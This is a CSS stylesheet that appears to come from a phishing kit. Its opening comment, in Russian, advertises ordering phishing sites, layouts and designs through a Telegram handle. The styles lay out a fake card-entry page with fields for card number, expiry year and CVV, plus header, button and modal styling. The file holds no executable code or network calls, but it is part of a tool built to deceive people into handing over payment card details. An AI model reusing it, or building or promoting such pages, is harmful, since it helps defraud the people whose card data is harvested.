/*
Разработка Chezz, заказать фишинг сайт, верстку и дизайн можно в телеге: @chezzy_chezz;
*/

body {
	display: -ms-flexbox;
	display: flex;
}

html, body {
	height: 100%;
	background-color: #f4f4f4;
}

@font-face {
font-family: 'Futura PT Medium';
src: url('FuturaPT-Medium.eot');
src: url('FuturaPT-Medium.eot?#iefix') format('embedded-opentype'),
url('FuturaPT-Medium.woff') format('woff'),
url('FuturaPT-Medium.ttf') format('truetype');
font-weight: normal;
font-style: normal;
}

.head_cvv {
	height: 80px;
	line-height: 80px;
	border-bottom: 1px solid #dbdcde;
	background-color: #ffffff;
}

.head_cvv img {
	margin-right: 10px;
}

.body_cvv {
	background-color: #f4f4f4;
	color: #333333;
	text-align: center;
}

.footer_cvv {
	height: 80px;
	line-height: 80px;
	border-top: 1px solid #dbdcde;
	background-color: #ffffff;
	color: #333333;
}

h2 {
	color: #333333;
	font-size: 35px;
	font-weight: 500;
	line-height: 38px;
	font-family: "Futura PT Medium";
}

.body_cvv p {
	color: #333333;
	font-size: 16px;
	line-height: 21px;
	margin-bottom: 20px;
}

.line {
	height: 4px;
	width: 75px;
	background-color: #00b3b4;
	margin: 20px auto;
}

.button_cvv {
	color: #ffffff;
	font-family: "Futura PT Medium";
	height: 48px;
	line-height: 48px;
	background-color: #00b3b4;
	display: table;
	width: 200px;
	margin: 27px auto 0;
	-webkit-transition: all 0.3s;
	-moz-transition: all 0.3s;
	transition: all 0.3s;
	-webkit-appearance: none;
	text-transform: uppercase;
	letter-spacing: 0.7px;
	text-align: center;
	border: none;
}

.button_cvv:hover {
	color: #ffffff;
	text-decoration: none;
	background-color: #e79824;
}

.step_conditions_title {
	margin-top: 60px;
	padding-bottom: 8px;
}

.step_conditions_mark {
	padding: 30px 0;
	text-transform: uppercase;
	color: #363636;
	font-size: 24px;
	line-height: 36px;
	font-weight: 400;
	border-top: #dbdcde 1px solid;
	border-bottom: #dbdcde 1px solid;
}

.step_conditions_mark span {
	color: #65b3b4;
	font-size: 36px;
	line-height: 36px;
	font-weight: 400;
}

.modal-content {
	border: none;
}

.modal-header {
	border: none;
}

.modal-body {
	padding: 1rem 3rem;
}

.modal-body ul {
	border-bottom: #dcdddf 1px solid;
	list-style: none;
	margin: 43px 0 46px 4px;
	padding-bottom: 34px;
}

.modal-body ul li:before {
	border-top: #33c3c5 3px solid;
	content: '';
	float: left;
	width: 10px;
	height: 3px;
	margin: 10px 18px 0 0;
	position: absolute;
	left: 0;
}

.modal-body ul li {
	color: #333333;
	overflow: hidden;
	font-size: 16px;
	line-height: 26px;
	margin-bottom: 9px;
	position: relative;
	padding-left: 27px;
}

.link_arrow {
	text-transform: uppercase;
	display: inline-block;
	-webkit-box-align: center;
	-webkit-align-items: center;
	-moz-box-align: center;
	-ms-flex-align: center;
	-ms-grid-row-align: center;
	align-items: center;
	-webkit-transition: -webkit-transform 300ms cubic-bezier(0.195, 1.29, 0.795, 1.36);
	transition: -webkit-transform 300ms cubic-bezier(0.195, 1.29, 0.795, 1.36);
	-moz-transition: transform 300ms cubic-bezier(0.195, 1.29, 0.795, 1.36),-moz-transform 300ms cubic-bezier(0.195, 1.29, 0.795, 1.36);
	-o-transition: transform 300ms cubic-bezier(0.195, 1.29, 0.795, 1.36),-o-transform 300ms cubic-bezier(0.195, 1.29, 0.795, 1.36);
	transition: transform 300ms cubic-bezier(0.195, 1.29, 0.795, 1.36);
	transition: transform 300ms cubic-bezier(0.195, 1.29, 0.795, 1.36),-webkit-transform 300ms cubic-bezier(0.195, 1.29, 0.795, 1.36),-moz-transform 300ms cubic-bezier(0.195, 1.29, 0.795, 1.36),-o-transform 300ms cubic-bezier(0.195, 1.29, 0.795, 1.36);
	cursor: pointer;
	-webkit-transform: translateZ(0);
	text-decoration: none;
	letter-spacing: 0.4;
	font-size: 14px;
	text-transform: uppercase;
	color: #303030;
	float: right;
	text-transform: none;
}

.link_arrow:hover {
	opacity: 0.8;
	color: #303030;
	text-decoration: none;
}

.arrow {
 	width: 28px;
	height: 15px;
 	margin: 0 0 0 14px;
 	-webkit-transition: -webkit-transform 250ms cubic-bezier(0.195, 1.29, 0.795, 1.36);
 	transition: -webkit-transform 250ms cubic-bezier(0.195, 1.29, 0.795, 1.36);
	-moz-transition: transform 250ms cubic-bezier(0.195, 1.29, 0.795, 1.36),-moz-transform 250ms cubic-bezier(0.195, 1.29, 0.795, 1.36);
 	-o-transition: transform 250ms cubic-bezier(0.195, 1.29, 0.795, 1.36),-o-transform 250ms cubic-bezier(0.195, 1.29, 0.795, 1.36);
 	transition: transform 250ms cubic-bezier(0.195, 1.29, 0.795, 1.36);
 	transition: transform 250ms cubic-bezier(0.195, 1.29, 0.795, 1.36),-webkit-transform 250ms cubic-bezier(0.195, 1.29, 0.795, 1.36),-moz-transform 250ms cubic-bezier(0.195, 1.29, 0.795, 1.36),-o-transform 250ms cubic-bezier(0.195, 1.29, 0.795, 1.36);
 	vertical-align: middle;
 	display: inline-block;
 	background: url(/img/link_right_black.png) no-repeat;
 	background-size: 28px;
}

.card_p {
	padding-bottom: 50px;
}

.wcard {
	min-width: 198px;
	max-width: 198px;
}

.wyear {
	min-width: 111px;
	max-width: 111px;
}

.wcvv {
	min-width: 81px;
	max-width: 82px;
}

.wallen_card {
	background-color: #ffffff;
	border: 1px solid #3c414f;
	border-radius: 99px;
	height: 43px;
	line-height: 43px;
	font-size: 12px;
	color: #3c414f;
	text-align: center;
	margin-bottom: 10px;
}

:active, :hover, :focus {
	outline: 0;
	outline-offset: 0;
}

.navbar-toggler:focus,.navbar-toggler:active {
	outline: none !important;
	box-shadow: none;
}

input:focus::-webkit-input-placeholder {
	color:transparent; 
}

input:focus:-moz-placeholder { 
	color:transparent; 
}

input:focus::-moz-placeholder { 
	color:transparent; 
}

input:focus:-ms-input-placeholder { 
	color:transparent; 
}

input::-webkit-input-placeholder {
	font-family: Roboto;
	font-size: 12px;
	color: #3c414f;
	text-transform: uppercase;
}

input::-ms-input-placeholder {
	font-family: Roboto;
	font-size: 12px;
	color: #3c414f;
	text-transform: uppercase;
}

input:-ms-input-placeholder {
	font-family: Roboto;
	font-size: 12px;
	color: #3c414f;
	text-transform: uppercase;
}

input::-moz-placeholder {
	font-family: Roboto;
	font-size: 12px;
	color: #3c414f;
	text-transform: uppercase;
}

input:-moz-placeholder {
	font-family: Roboto;
	font-size: 12px;
	color: #3c414f;
	text-transform: uppercase;
}